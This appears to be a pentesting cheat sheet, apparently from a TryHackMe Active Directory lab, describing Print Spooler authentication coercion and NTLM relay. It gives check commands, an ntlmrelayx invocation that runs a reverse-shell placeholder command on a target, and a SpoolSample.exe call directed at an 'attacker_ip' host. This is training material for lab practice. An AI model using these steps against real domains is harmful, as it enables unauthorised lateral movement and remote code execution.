An authenticated domain user can force the print spooler service to authenticate to an arbitrary IP.
Requirements
- A valid set of AD user credentials.
- Network connectivity to the target’s SMB service.
- The target host must be running the Print Spooler service.
- The host must not have enforced SMB signing.
Check if target is vulnerable
Print Spooler Service present on target host
Check if print spooler service is running on a target host:
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.locEquivalent powershell:
Get-PrinterPort -ComputerName thmserver2.za.tryhackme.locIf the check errors...
Sometimes Microsoft disables network access to these ports. If that happens, just try the exploit.
SMB Signing not enforced
nmap --script=smb2-security-mode -p445 source destCheck if either the source (if on a remote pivot host) or the destination requires SMB signing.
Exploitation
The below example attacks the auth.server.domain.name by forcing a compromised host’s print spooler to authenticate against it.
Set up Authentication Relay on attacker machine (may be unstable) and specify what command to execute on auth.server.domain.name:
/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb://"auth.server.domain.name" -c 'revsh command' -debugThis relays the authentication request from the print spooler service to a domain-joined machine.
Start attack on compromised host (authenticate against auth.server.domain.name through attacker_ip):
SpoolSample.exe "auth.server.domain.name" "attacker_ip"Wait for the relay to receive authentication attempt and execute the command.